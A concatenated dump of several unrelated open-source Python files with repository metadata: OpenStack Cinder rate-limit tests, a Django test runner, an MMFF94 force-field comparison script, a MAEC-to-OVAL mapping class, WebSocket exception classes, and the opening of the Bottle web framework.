"unit": "MINUTE", "value": 10, "remaining": 10, }, { "verb": "POST", "next-available": "1970-01-01T00:00:00", "unit": "HOUR", "value": 5, "remaining": 5, }, ], }, { "regex": "changes-since", "uri": "changes-since*", "limit": [ { "verb": "GET", "next-available": "1970-01-01T00:00:00", "unit": "MINUTE", "value": 5, "remaining": 5, }, ], }, ], "absolute": {"maxTotalVolumeGigabytes": 512, "maxTotalVolumes": 5, }, }, } body = jsonutils.loads(response.body) self.assertEqual(expected, body) def _populate_limits_diff_regex(self, request): """Put limit info into a request.""" _limits = [ limits.Limit("GET", "*", ".*", 10, 60).display(), limits.Limit("GET", "*", "*.*", 10, 60).display(), ] request.environ["cinder.limits"] = _limits return request def test_index_diff_regex(self): """Test getting limit details in JSON.""" request = self._get_index_request() request = self._populate_limits_diff_regex(request) response = request.get_response(self.controller) expected = { "limits": { "rate": [ { "regex": ".*", "uri": "*", "limit": [ { "verb": "GET", "next-available": "1970-01-01T00:00:00", "unit": "MINUTE", "value": 10, "remaining": 10, }, ], }, { "regex": "*.*", "uri": "*", "limit": [ { "verb": "GET", "next-available": "1970-01-01T00:00:00", "unit": "MINUTE", "value": 10, "remaining": 10, }, ], }, ], "absolute": {}, }, } body = jsonutils.loads(response.body) self.assertEqual(expected, body) def _test_index_absolute_limits_json(self, expected): request = self._get_index_request() response = request.get_response(self.controller) body = jsonutils.loads(response.body) self.assertEqual(expected, body['limits']['absolute']) def test_index_ignores_extra_absolute_limits_json(self): self.absolute_limits = {'unknown_limit': 9001} self._test_index_absolute_limits_json({}) class TestLimiter(limits.Limiter): pass class LimitMiddlewareTest(BaseLimitTestSuite): """Tests for the `limits.RateLimitingMiddleware` class.""" @webob.dec.wsgify def _empty_app(self, request): """Do-nothing WSGI app.""" pass def setUp(self): """Prepare middleware for use through fake WSGI app.""" super(LimitMiddlewareTest, self).setUp() _limits = '(GET, *, .*, 1, MINUTE)' self.app = limits.RateLimitingMiddleware(self._empty_app, _limits, "%s.TestLimiter" % self.__class__.__module__) def test_limit_class(self): """Test that middleware selected correct limiter class.""" self.assertIsInstance(self.app._limiter, TestLimiter) def test_good_request(self): """Test successful GET request through middleware.""" request = webob.Request.blank("/") response = request.get_response(self.app) self.assertEqual(200, response.status_int) def test_limited_request_json(self): """Test a rate-limited (413) GET request through middleware.""" request = webob.Request.blank("/") response = request.get_response(self.app) self.assertEqual(200, response.status_int) request = webob.Request.blank("/") response = request.get_response(self.app) self.assertEqual(413, response.status_int) self.assertIn('Retry-After', response.headers) retry_after = int(response.headers['Retry-After']) self.assertAlmostEqual(retry_after, 60, 1) body = jsonutils.loads(response.body) expected = "Only 1 GET request(s) can be made to * every minute." value = body["overLimitFault"]["details"].strip() self.assertEqual(expected, value) class LimitTest(BaseLimitTestSuite): """Tests for the `limits.Limit` class.""" def test_GET_no_delay(self): """Test a limit handles 1 GET per second.""" limit = limits.Limit("GET", "*", ".*", 1, 1) delay = limit("GET", "/anything") self.assertIsNone(delay) self.assertEqual(0, limit.next_request) self.assertEqual(0, limit.last_request) def test_GET_delay(self): """Test two calls to 1 GET per second limit.""" limit = limits.Limit("GET", "*", ".*", 1, 1) delay = limit("GET", "/anything") self.assertIsNone(delay) delay = limit("GET", "/anything") self.assertEqual(1, delay) self.assertEqual(1, limit.next_request) self.assertEqual(0, limit.last_request) self.time += 4 delay = limit("GET", "/anything") self.assertIsNone(delay) self.assertEqual(4, limit.next_request) self.assertEqual(4, limit.last_request) def test_invalid_limit(self): """Test that invalid limits are properly checked on construction.""" self.assertRaises(ValueError, limits.Limit, "GET", "*", ".*", 0, 1) class ParseLimitsTest(BaseLimitTestSuite): """Tests for the default limits parser in the `limits.Limiter` class.""" def test_invalid(self): """Test that parse_limits() handles invalid input correctly.""" self.assertRaises(ValueError, limits.Limiter.parse_limits, ';;;;;') def test_bad_rule(self): """Test that parse_limits() handles bad rules correctly.""" self.assertRaises(ValueError, limits.Limiter.parse_limits, 'GET, *, .*, 20, minute') def test_missing_arg(self): """Test that parse_limits() handles missing args correctly.""" self.assertRaises(ValueError, limits.Limiter.parse_limits, '(GET, *, .*, 20)') def test_bad_value(self): """Test that parse_limits() handles bad values correctly.""" self.assertRaises(ValueError, limits.Limiter.parse_limits, '(GET, *, .*, foo, minute)') def test_bad_unit(self): """Test that parse_limits() handles bad units correctly.""" self.assertRaises(ValueError, limits.Limiter.parse_limits, '(GET, *, .*, 20, lightyears)') def test_multiple_rules(self): """Test that parse_limits() handles multiple rules correctly.""" try: l = limits.Limiter.parse_limits('(get, *, .*, 20, minute);' '(PUT, /foo*, /foo.*, 10, hour);' '(POST, /bar*, /bar.*, 5, second);' '(Say, /derp*, /derp.*, 1, day)') except ValueError as e: self.assertFalse(six.text_type(e)) # Make sure the number of returned limits are correct self.assertEqual(4, len(l)) # Check all the verbs... expected = ['GET', 'PUT', 'POST', 'SAY'] self.assertEqual(expected, [t.verb for t in l]) # ...the URIs... expected = ['*', '/foo*', '/bar*', '/derp*'] self.assertEqual(expected, [t.uri for t in l]) # ...the regexes... expected = ['.*', '/foo.*', '/bar.*', '/derp.*'] self.assertEqual(expected, [t.regex for t in l]) # ...the values... expected = [20, 10, 5, 1] self.assertEqual(expected, [t.value for t in l]) # ...and the units... expected = [limits.PER_MINUTE, limits.PER_HOUR, limits.PER_SECOND, limits.PER_DAY] self.assertEqual(expected, [t.unit for t in l]) class LimiterTest(BaseLimitTestSuite): """Tests for the in-memory `limits.Limiter` class.""" def setUp(self): """Run before each test.""" super(LimiterTest, self).setUp() userlimits = {'limits.user3': '', 'limits.user0': '(get, *, .*, 4, minute);' '(put, *, .*, 2, minute)'} self.limiter = limits.Limiter(TEST_LIMITS, **userlimits) def _check(self, num, verb, url, username=None): """Check and yield results from checks.""" for x in range(num): yield self.limiter.check_for_delay(verb, url, username)[0] def _check_sum(self, num, verb, url, username=None): """Check and sum results from checks.""" results = self._check(num, verb, url, username) return sum(item for item in results if item) def test_no_delay_GET(self): """Ensure no delay on a single call for a limit verb we didn't set.""" delay = self.limiter.check_for_delay("GET", "/anything") self.assertEqual((None, None), delay) def test_no_delay_PUT(self): """Ensure no delay on a single call for a known limit.""" delay = self.limiter.check_for_delay("PUT", "/anything") self.assertEqual((None, None), delay) def test_delay_PUT(self): """Test delay on 11th PUT request. Ensure the 11th PUT will result in a delay of 6.0 seconds until the next request will be granced. """ expected = [None] * 10 + [6.0] results = list(self._check(11, "PUT", "/anything")) self.assertEqual(expected, results) def test_delay_POST(self): """Test delay on 8th POST request. Ensure the 8th POST will result in a delay of 6.0 seconds until the next request will be granced. """ expected = [None] * 7 results = list(self._check(7, "POST", "/anything")) self.assertEqual(expected, results) expected = 60.0 / 7.0 results = self._check_sum(1, "POST", "/anything") self.assertAlmostEqual(expected, results, 8) def test_delay_GET(self): """Ensure the 11th GET will result in NO delay.""" expected = [None] * 11 results = list(self._check(11, "GET", "/anything")) self.assertEqual(expected, results) expected = [None] * 4 + [15.0] results = list(self._check(5, "GET", "/foo", "user0")) self.assertEqual(expected, results) def test_delay_PUT_volumes(self): """Test delay on /volumes. Ensure PUT on /volumes limits at 5 requests, and PUT elsewhere is still OK after 5 requests...but then after 11 total requests, PUT limiting kicks in. """ # First 6 requests on PUT /volumes expected = [None] * 5 + [12.0] results = list(self._check(6, "PUT", "/volumes")) self.assertEqual(expected, results) # Next 5 request on PUT /anything expected = [None] * 4 + [6.0] results = list(self._check(5, "PUT", "/anything")) self.assertEqual(expected, results) def test_delay_PUT_wait(self): """Test limit is lifted again. Ensure after hitting the limit and then waiting for the correct amount of time, the limit will be lifted. """ expected = [None] * 10 + [6.0] results = list(self._check(11, "PUT", "/anything")) self.assertEqual(expected, results) # Advance time self.time += 6.0 expected = [None, 6.0] results = list(self._check(2, "PUT", "/anything")) self.assertEqual(expected, results) def test_multiple_delays(self): """Ensure multiple requests still get a delay.""" expected = [None] * 10 + [6.0] * 10 results = list(self._check(20, "PUT", "/anything")) self.assertEqual(expected, results) self.time += 1.0 expected = [5.0] * 10 results = list(self._check(10, "PUT", "/anything")) self.assertEqual(expected, results) expected = [None] * 2 + [30.0] * 8 results = list(self._check(10, "PUT", "/anything", "user0")) self.assertEqual(expected, results) def test_user_limit(self): """Test user-specific limits.""" self.assertEqual([], self.limiter.levels['user3']) self.assertEqual(2, len(self.limiter.levels['user0'])) def test_multiple_users(self): """Tests involving multiple users.""" # User0 expected = [None] * 2 + [30.0] * 8 results = list(self._check(10, "PUT", "/anything", "user0")) self.assertEqual(expected, results) # User1 expected = [None] * 10 + [6.0] * 10 results = list(self._check(20, "PUT", "/anything", "user1")) self.assertEqual(expected, results) # User2 expected = [None] * 10 + [6.0] * 5 results = list(self._check(15, "PUT", "/anything", "user2")) self.assertEqual(expected, results) # User3 expected = [None] * 20 results = list(self._check(20, "PUT", "/anything", "user3")) self.assertEqual(expected, results) self.time += 1.0 # User1 again expected = [5.0] * 10 results = list(self._check(10, "PUT", "/anything", "user1")) self.assertEqual(expected, results) self.time += 1.0 # User1 again expected = [4.0] * 5 results = list(self._check(5, "PUT", "/anything", "user2")) self.assertEqual(expected, results) # User0 again expected = [28.0] results = list(self._check(1, "PUT", "/anything", "user0")) self.assertEqual(expected, results) self.time += 28.0 expected = [None, 30.0] results = list(self._check(2, "PUT", "/anything", "user0")) self.assertEqual(expected, results) class WsgiLimiterTest(BaseLimitTestSuite): """Tests for `limits.WsgiLimiter` class.""" def setUp(self): """Run before each test.""" super(WsgiLimiterTest, self).setUp() self.app = limits.WsgiLimiter(TEST_LIMITS) def _request_data(self, verb, path): """Get data describing a limit request verb/path.""" return jsonutils.dump_as_bytes({"verb": verb, "path": path}) def _request(self, verb, url, username=None): """POST request to given url by given username. Make sure that POSTing to the given url causes the given username to perform the given action. Make the internal rate limiter return delay and make sure that the WSGI app returns the correct response. """ if username: request = webob.Request.blank("/%s" % username) else: request = webob.Request.blank("/") request.method = "POST" request.body = self._request_data(verb, url) response = request.get_response(self.app) if "X-Wait-Seconds" in response.headers: self.assertEqual(403, response.status_int) return response.headers["X-Wait-Seconds"] self.assertEqual(204, response.status_int) def test_invalid_methods(self): """Only POSTs should work.""" for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]: request = webob.Request.blank("/", method=method) response = request.get_response(self.app) self.assertEqual(405, response.status_int) def test_good_url(self): delay = self._request("GET", "/something") self.assertIsNone(delay) def test_escaping(self): delay = self._request("GET", "/something/jump%20up") self.assertIsNone(delay) def test_response_to_delays(self): delay = self._request("GET", "/delayed") self.assertIsNone(delay) delay = self._request("GET", "/delayed") self.assertEqual('60.00', delay) def test_response_to_delays_usernames(self): delay = self._request("GET", "/delayed", "user1") self.assertIsNone(delay) delay = self._request("GET", "/delayed", "user2") self.assertIsNone(delay) delay = self._request("GET", "/delayed", "user1") self.assertEqual('60.00', delay) delay = self._request("GET", "/delayed", "user2") self.assertEqual('60.00', delay) class FakeHttplibSocket(object): """Fake `http_client.HTTPResponse` replacement.""" def __init__(self, response_string): """Initialize new `FakeHttplibSocket`.""" if isinstance(response_string, six.text_type): response_string = response_string.encode('utf-8') self._buffer = six.BytesIO(response_string) def makefile(self, mode, *args): """Returns the socket's internal buffer.""" return self._buffer class FakeHttplibConnection(object): """Fake `http_client.HTTPConnection`.""" def __init__(self, app, host): """Initialize `FakeHttplibConnection`.""" self.app = app self.host = host def request(self, method, path, body="", headers=None): """Fake request handler. Requests made via this connection actually get translated and routed into our WSGI app, we then wait for the response and turn it back into an `http_client.HTTPResponse`. """ if not headers: headers = {} req = webob.Request.blank(path) req.method = method req.headers = headers req.host = self.host req.body = body resp = str(req.get_response(self.app)) resp = "HTTP/1.0 %s" % resp sock = FakeHttplibSocket(resp) self.http_response = http_client.HTTPResponse(sock) self.http_response.begin() def getresponse(self): """Return our generated response from the request.""" return self.http_response def wire_HTTPConnection_to_WSGI(host, app): """Monkeypatches HTTPConnection. Monkeypatches HTTPConnection so that if you try to connect to host, you are instead routed straight to the given WSGI app. After calling this method, when any code calls http_client.HTTPConnection(host) the connection object will be a fake. Its requests will be sent directly to the given WSGI app rather than through a socket. Code connecting to hosts other than host will not be affected. This method may be called multiple times to map different hosts to different apps. This method returns the original HTTPConnection object, so that the caller can restore the default HTTPConnection interface (for all hosts). """ class HTTPConnectionDecorator(object): """Decorator to mock the HTTPConecction class. Wraps the real HTTPConnection class so that when you instantiate the class you might instead get a fake instance. """ def __init__(self, wrapped): self.wrapped = wrapped def __call__(self, connection_host, *args, **kwargs): if connection_host == host: return FakeHttplibConnection(app, host) else: return self.wrapped(connection_host, *args, **kwargs) oldHTTPConnection = http_client.HTTPConnection new_http_connection = HTTPConnectionDecorator(http_client.HTTPConnection) http_client.HTTPConnection = new_http_connection return oldHTTPConnection class WsgiLimiterProxyTest(BaseLimitTestSuite): """Tests for the `limits.WsgiLimiterProxy` class.""" def setUp(self): """setUp() for WsgiLimiterProxyTest. Do some nifty HTTP/WSGI magic which allows for WSGI to be called directly by something like the `http_client` library. """ super(WsgiLimiterProxyTest, self).setUp() self.app = limits.WsgiLimiter(TEST_LIMITS) oldHTTPConnection = ( wire_HTTPConnection_to_WSGI("169.254.0.1:80", self.app)) self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80") self.addCleanup(self._restore, oldHTTPConnection) def _restore(self, oldHTTPConnection): # restore original HTTPConnection object http_client.HTTPConnection = oldHTTPConnection def test_200(self): """Successful request test.""" delay = self.proxy.check_for_delay("GET", "/anything") self.assertEqual((None, None), delay) def test_403(self): """Forbidden request test.""" delay = self.proxy.check_for_delay("GET", "/delayed") self.assertEqual((None, None), delay) delay, error = self.proxy.check_for_delay("GET", "/delayed") error = error.strip() expected = ("60.00", b"403 Forbidden\n\nOnly 1 GET request(s) can be " b"made to /delayed every minute.") self.assertEqual(expected, (delay, error)) class LimitsViewBuilderTest(test.TestCase): def setUp(self): super(LimitsViewBuilderTest, self).setUp() self.view_builder = views.limits.ViewBuilder() self.rate_limits = [{"URI": "*", "regex": ".*", "value": 10, "verb": "POST", "remaining": 2, "unit": "MINUTE", "resetTime": 1311272226}, {"URI": "*/volumes", "regex": "^/volumes", "value": 50, "verb": "POST", "remaining": 10, "unit": "DAY", "resetTime": 1311272226}] self.absolute_limits = {"gigabytes": 1, "backup_gigabytes": 2, "volumes": 3, "snapshots": 4, "backups": 5} def test_build_limits(self): tdate = "2011-07-21T18:17:06" expected_limits = { "limits": {"rate": [{"uri": "*", "regex": ".*", "limit": [{"value": 10, "verb": "POST", "remaining": 2, "unit": "MINUTE", "next-available": tdate}]}, {"uri": "*/volumes", "regex": "^/volumes", "limit": [{"value": 50, "verb": "POST", "remaining": 10, "unit": "DAY", "next-available": tdate}]}], "absolute": {"maxTotalVolumeGigabytes": 1, "maxTotalBackupGigabytes": 2, "maxTotalVolumes": 3, "maxTotalSnapshots": 4, "maxTotalBackups": 5}}} output = self.view_builder.build(self.rate_limits, self.absolute_limits) self.assertDictEqual(expected_limits, output) def test_build_limits_empty_limits(self): expected_limits = {"limits": {"rate": [], "absolute": {}}} abs_limits = {} rate_limits = [] output = self.view_builder.build(rate_limits, abs_limits) self.assertDictEqual(expected_limits, output)
apache-2.0
-5,903,511,170,793,343,000
34.929716
79
0.529874
false
thesgc/cbh_datastore_ws
runtests.py
1
1190
import sys try: from django.conf import settings from django.test.utils import get_runner settings.configure( DEBUG=True, USE_TZ=True, DATABASES={ "default": { "ENGINE": "django.db.backends.sqlite3", } }, ROOT_URLCONF="cbh_datastore_ws.urls", INSTALLED_APPS=[ "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sites", "cbh_datastore_ws", ], SITE_ID=1, MIDDLEWARE_CLASSES=(), ) try: import django setup = django.setup except AttributeError: pass else: setup() except ImportError: import traceback traceback.print_exc() raise ImportError( "To fix this error, run: pip install -r requirements-test.txt") def run_tests(*test_args): if not test_args: test_args = ['tests'] # Run tests TestRunner = get_runner(settings) test_runner = TestRunner() failures = test_runner.run_tests(test_args) if failures: sys.exit(bool(failures)) if __name__ == '__main__': run_tests(*sys.argv[1:])
mit
-6,751,464,929,567,952,000
20.25
71
0.553782
false
kylelutz/chemkit
tests/auto/plugins/mmff/analyze.py
1
3504
#!/usr/bin/python # this script compares the mmff94.expected and mmff94.actual files # and outputs the differences import os import sys import xml.dom.minidom COLORS_ENABLED = False class AtomResults: def __init__(self, type, charge): self.type = type self.charge = charge class MoleculeResults: def __init__(self, name, energy): self.name = name self.energy = energy self.atoms = [] class ResultsFile: def __init__(self, fileName): self.fileName = fileName self.molecules = [] def read(self): doc = xml.dom.minidom.parse(self.fileName) for moleculeElem in doc.getElementsByTagName('molecule'): name = moleculeElem.getAttribute('name') energy = float(moleculeElem.getAttribute('energy')) moleculeResults = MoleculeResults(name, energy) for atomElem in moleculeElem.getElementsByTagName('atom'): type = atomElem.getAttribute('type') charge = float(atomElem.getAttribute('charge')) moleculeResults.atoms.append(AtomResults(type, charge)) self.molecules.append(moleculeResults) if __name__ == '__main__': actualResultsFile = 'mmff94.actual' expectedResultsFile = 'mmff94.expected' if not os.path.exists(actualResultsFile): print 'could not find actual results file (%s)' % actualResultsFile sys.exit(-1) if not os.path.exists(expectedResultsFile): print 'could not find expected results file (%s)' % expectedResultsFile sys.exit(-1) actualResults = ResultsFile(actualResultsFile) actualResults.read() expectedResults = ResultsFile(expectedResultsFile) expectedResults.read() # escape codes to color text RED_COLOR = '\033[91m' END_COLOR = '\033[0m' if not COLORS_ENABLED: RED_COLOR = '' END_COLOR = '' ATOMS_FAILED = 0 MOLECULES_FAILED = 0 # compare files expectedMoleculeIndex = 0 for i, actualMolecule in enumerate(actualResults.molecules): expectedMolecule = expectedResults.molecules[expectedMoleculeIndex] while expectedMolecule.name != actualMolecule.name: expectedMoleculeIndex += 1 expectedMolecule = expectedResults.molecules[expectedMoleculeIndex] print '%i. %s' % (expectedMoleculeIndex+1, actualMolecule.name) for j in range(len(actualMolecule.atoms)): actualAtom = actualMolecule.atoms[j] expectedAtom = expectedMolecule.atoms[j] expectedTypeText = '' colorCode = '' if(actualAtom.type != expectedAtom.type or (abs(actualAtom.charge - expectedAtom.charge) > 0.01)): ATOMS_FAILED += 1 colorCode = RED_COLOR expectedTypeText = '%s[%s, %s] -- FAILED%s' % (colorCode, expectedAtom.type, expectedAtom.charge, END_COLOR) print ' %i. %s, %s %s' % (j+1, actualAtom.type, actualAtom.charge, expectedTypeText) colorCode = '' if(int(actualMolecule.energy) != int(expectedMolecule.energy)): MOLECULES_FAILED += 1 colorCode = RED_COLOR print 'energy: %f %s[%f]%s' % (actualMolecule.energy, colorCode, expectedMolecule.energy, END_COLOR) # print some statistics print >> sys.stderr, '' print >> sys.stderr, 'atoms: %i failed' % ATOMS_FAILED print >> sys.stderr, 'molecules: %i failed' % MOLECULES_FAILED
bsd-3-clause
8,729,999,212,681,322,000
32.371429
124
0.631849
false
MAECProject/maec-to-oval
cybox_oval_mappings.py
1
10331
#MAEC -> OVAL Translator #v0.94 BETA #Generic mappings class #Generates OVAL tests/objects/states from a CybOX Defined Object import oval57 as oval class cybox_oval_mappings(object): def __init__(self, id_namespace): self.test_id_base = 0 self.obj_id_base = 0 self.ste_id_base = 0 self.def_id_base = 0 self.id_namespace = id_namespace #Mappings #CybOX Condition to OVAL operation mappings self.operator_condition_mappings = {'Equals':'equals','DoesNotEqual':'not equal','Contains':'pattern match',\ 'GreaterThan':'greater than', 'GreaterThanOrEqual':'greater than or equal',\ 'LessThan':'less than','LessThanOrEqual':'less than or equal','FitsPattern':'pattern match',\ 'BitwiseAnd':'bitwise and', 'BitwiseOr':'bitwise or'} #CybOX Object Type to OVAL object mappings self.object_mappings = {'WinRegistryKeyObj:WindowsRegistryKeyObjectType':'registry_object', 'FileObj:FileObjectType':'file_object', 'WinFileObj:WindowsFileObjectType':'file_object', 'WinExecutableFileObj:WindowsExecutableFileObjectType':'file_object'} #CybOX FileObject to OVAL file_object mappings (CybOX element name : {OVAL element name, OVAL element datatype}) self.file_object_mappings = {'File_Path':{'name':'path','datatype':'string'},'Full_Path':{'name':'filepath','datatype':'string'}, 'File_Name':{'name':'filename', 'datatype':'string'}} #CybOX FileObject to OVAL file_state mappings self.file_state_mappings = {'Size_In_Bytes':{'name':'size','datatype':'int'},'Accessed_Time':{'name':'a_time','datatype':'int'},\ 'Modified_Time':{'name':'m_time','datatype':'int'},'Created_Time':{'name':'c_time','datatype':'int'}} #CybOX WinRegistryObject to OVAL registry_object mappings self.registry_object_mappings = {'Key':{'name':'key','datatype':'string'},'Hive':{'name':'hive','datatype':'string'},'Name':{'name':'name','datatype':'string'}} #CybOX WinRegistryObject Values to OVAL registry_state mappings self.registry_state_mappings = {'Name':{'name':'name','datatype':'string'},'Data':{'name':'value','datatype':'string'},'Datatype':{'name':'type','datatype':'string'}} #Creates and returns a dictionary of OVAL test, object, and state (if applicable) def create_oval(self, cybox_defined_object, reference): oval_entities = {} oval_states = [] object_type = cybox_defined_object._XSI_NS + ':' + cybox_defined_object._XSI_TYPE if object_type in self.object_mappings.keys(): oval_object = self.create_oval_object(object_type, cybox_defined_object) if oval_object is not None: if object_type == 'WinRegistryKeyObj:WindowsRegistryKeyObjectType': self.process_registry_values(cybox_defined_object, oval_object, oval_states) else: state = self.create_oval_state(object_type, cybox_defined_object) if state is not None: oval_states.append(self.create_oval_state(object_type, cybox_defined_object)) oval_test = self.create_oval_test(object_type, oval_object, oval_entities, oval_states, reference) oval_entities['test'] = oval_test oval_entities['object'] = oval_object if oval_states is not None and len(oval_states) > 0: oval_entities['state'] = oval_states return oval_entities else: return None #Create the OVAL object def create_oval_object(self, object_type, cybox_defined_object): oval_object_type = self.object_mappings.get(object_type) oval_object_mappings = self.object_mappings.get(object_type) + '_mappings' oval_object = getattr(oval,oval_object_type)() oval_object.set_id(self.generate_obj_id()) oval_object.set_version(1) object_fields = cybox_defined_object._fields # File Object related corner cases if "File" in object_type: if object_fields["Full_Path"]: del object_fields["File_Name"] del object_fields["File_Path"] # Corner case where file_path is meant to be used as the full path to the file elif object_fields["File_Path"] and (not object_fields["Full_Path"] and not object_fields["File_Name"]): object_fields["Full_Path"] = object_fields["File_Path"] del object_fields["File_Path"] for element, value in object_fields.items(): if value is not None: if element in getattr(getattr(self,oval_object_mappings),'keys')(): element_dictionary = getattr(getattr(self,oval_object_mappings),'get')(element) element_name = element_dictionary.get('name') element_datatype = element_dictionary.get('datatype') method = 'set_' + element_name getattr(oval_object,method)(oval.EntityBaseType(datatype = element_datatype, operation = self.operator_condition_mappings.get(value), valueOf_=value)) #Do some basic object sanity checking for certain objects if object_type == 'WinRegistryKeyObj:WindowsRegistryKeyObjectType' and (oval_object.hive is None or oval_object.key is None): return None elif 'FileObjectType' in object_type and (oval_object.filepath is None and (oval_object.path is None or oval_object.filename is None)): return None return oval_object #Create any OVAL states def create_oval_state(self, object_type, cybox_defined_object): oval_state_type = self.object_mappings.get(object_type).split('_')[0] + '_state' oval_state_mappings = oval_state_type + '_mappings' oval_state = getattr(oval,oval_state_type)(version = 1, id = self.generate_ste_id()) oval_state.set_id(self.generate_ste_id()) object_fields = cybox_defined_object._fields for element, value in object_fields.items(): if value is not None: if element in getattr(getattr(self,oval_state_mappings),'keys')(): element_dictionary = getattr(getattr(self,oval_state_mappings),'get')(element) element_name = element_dictionary.get('name') element_datatype = element_dictionary.get('datatype') method = 'set_' + element_name getattr(oval_state,method)(oval.EntityBaseType(datatype = element_datatype, operation = self.operator_condition_mappings.get(value), valueOf_=value.value)) if oval_state.hasContent_(): return oval_state #Create the OVAL test def create_oval_test(self, object_type, oval_object, oval_entities, oval_states, reference = None): oval_test_type = self.object_mappings.get(object_type).split('_')[0] + '_test' #Create the test comment = 'OVAL Test created from MAEC Action ' + reference oval_test = getattr(oval,oval_test_type)(id = self.generate_test_id(), check = 'at least one', version=1.0, comment = comment) oval_test.set_object(oval.ObjectRefType(object_ref = oval_object.get_id())) if len(oval_states) > 0: for state in oval_states: if state is not None: oval_test.add_state(oval.StateRefType(state_ref = state.get_id())) return oval_test #Handle any Values inside a Registry object def process_registry_values(self, cybox_defined_object, oval_object, oval_states): #Special registry Values handling if cybox_defined_object.values is not None: name_set = False for reg_value in cybox_defined_object.values: oval_state = oval.registry_state(version = 1, id = self.generate_ste_id()) for element, value in reg_value._fields.items(): if value is not None: #Corner case for handling multiple name/value pairs in the OVAL object if len(cybox_defined_object.values) == 1 and not name_set: if element in self.registry_object_mappings.keys(): oval_element = self.registry_object_mappings.get(element) method = 'set_' + oval_element.get('name') getattr(oval_object,method)(oval.EntityBaseType(datatype = 'string', operation = self.operator_condition_mappings.get(value), valueOf_=value.value)) name_set = True elif len(cybox_defined_object.values) > 1 and not name_set: oval_object.set_name(oval.EntityBaseType(datatype = 'string', operation = 'pattern match', valueOf_='.*')) name_set = True if element in self.registry_state_mappings.keys(): oval_element = self.registry_state_mappings.get(element) method = 'set_' + oval_element.get('name') getattr(oval_state,method)(oval.EntityBaseType(datatype = 'string', operation = self.operator_condition_mappings.get(value), valueOf_=value.value)) if oval_state.hasContent_(): oval_states.append(oval_state) def generate_test_id(self): self.test_id_base += 1 test_id = 'oval:' + self.id_namespace + ':tst:' + str(self.test_id_base) return test_id def generate_obj_id(self): self.obj_id_base += 1 obj_id = 'oval:' + self.id_namespace + ':obj:' + str(self.obj_id_base) return obj_id def generate_ste_id(self): self.ste_id_base += 1 ste_id = 'oval:' + self.id_namespace + ':ste:' + str(self.ste_id_base) return ste_id def generate_def_id(self): self.def_id_base += 1 def_id = 'oval:' + self.id_namespace + ':def:' + str(self.def_id_base) return def_id
bsd-3-clause
-8,493,995,175,343,858,000
58.37931
180
0.597425
false
CylonicRaider/websocket-server
websocket_server/exceptions.py
1
1127
# websocket_server -- WebSocket/HTTP server/client library # https://github.com/CylonicRaider/websocket-server """ Exceptions. """ __all__ = ['WebSocketError', 'ProtocolError', 'InvalidDataError', 'ConnectionClosedError'] class WebSocketError(Exception): """ Base class for all exceptions. """ class ProtocolError(WebSocketError): """ Exception for failure of the other side to adher to the protocol. The "code" attribute contains the error code (a CLOSE_* from the constants module) or None. """ def __init__(self, message, code=None): """ __init__(message, code=None) -> None Initialize a ProtocolError instance. message is passed to the superclass constructor, code is stored in the same-named attribute. """ WebSocketError.__init__(self, message) self.code = code class InvalidDataError(ProtocolError, ValueError): """ Invalid data have been encountered. """ class ConnectionClosedError(WebSocketError): """ Raised when trying to write a message after the connection closed. """
mit
-2,971,920,080,136,131,600
25.209302
70
0.657498
false
enckse/system-viewer
bottle.py
1
146747
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Bottle is a fast and simple micro-framework for small web applications. It offers request dispatching (Routes) with url parameter support, templates, a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and template engines - all in a single file and with no dependencies other than the Python Standard Library. Homepage and documentation: http://bottlepy.org/ Copyright (c) 2014, Marcel Hellkamp. License: MIT (see LICENSE for details) """ from __future__ import with_statement __author__ = 'Marcel Hellkamp' __version__ = '0.13-dev' __license__ = 'MIT' # The gevent and eventlet server adapters need to patch some modules before # they are imported. This is why we parse the commandline parameters here but # handle them later if __name__ == '__main__': from optparse import OptionParser _cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app") _opt = _cmd_parser.add_option _opt("--version", action="store_true", help="show version number.") _opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") _opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") _opt("-p", "--plugin", action="append", help="install additional plugin/s.") _opt("--debug", action="store_true", help="start server in debug mode.") _opt("--reload", action="store_true", help="auto-reload on file changes.") _cmd_options, _cmd_args = _cmd_parser.parse_args() if _cmd_options.server: if _cmd_options.server.startswith('gevent'): import gevent.monkey; gevent.monkey.patch_all() elif _cmd_options.server.startswith('eventlet'): import eventlet; eventlet.monkey_patch() import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\ os, re, subprocess, sys, tempfile, threading, time, warnings from datetime import date as datedate, datetime, timedelta from tempfile import TemporaryFile from traceback import format_exc, print_exc from inspect import getargspec from unicodedata import normalize try: from simplejson import dumps as json_dumps, loads as json_lds except ImportError: # pragma: no cover try: from json import dumps as json_dumps, loads as json_lds except ImportError: try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds except ImportError: def json_dumps(data): raise ImportError("JSON support requires Python 2.6 or simplejson.") json_lds = json_dumps # We now try to fix 2.5/2.6/3.1/3.2 incompatibilities. # It ain't pretty but it works... Sorry for the mess. py = sys.version_info py3k = py >= (3, 0, 0) py25 = py < (2, 6, 0) py31 = (3, 1, 0) <= py < (3, 2, 0) # Workaround for the missing "as" keyword in py3k. def _e(): return sys.exc_info()[1] # Workaround for the "print is a keyword/function" Python 2/3 dilemma # and a fallback for mod_wsgi (resticts stdout/err attribute access) try: _stdout, _stderr = sys.stdout.write, sys.stderr.write except IOError: _stdout = lambda x: sys.stdout.write(x) _stderr = lambda x: sys.stderr.write(x) # Lots of stdlib and builtin differences. if py3k: import http.client as httplib import _thread as thread from urllib.parse import urljoin, SplitResult as UrlSplitResult from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote urlunquote = functools.partial(urlunquote, encoding='latin1') from http.cookies import SimpleCookie from collections import MutableMapping as DictMixin import pickle from io import BytesIO from configparser import ConfigParser basestring = str unicode = str json_loads = lambda s: json_lds(touni(s)) callable = lambda x: hasattr(x, '__call__') imap = map def _raise(*a): raise a[0](a[1]).with_traceback(a[2]) else: # 2.x import httplib import thread from urlparse import urljoin, SplitResult as UrlSplitResult from urllib import urlencode, quote as urlquote, unquote as urlunquote from Cookie import SimpleCookie from itertools import imap import cPickle as pickle from StringIO import StringIO as BytesIO from ConfigParser import SafeConfigParser as ConfigParser if py25: msg = "Python 2.5 support may be 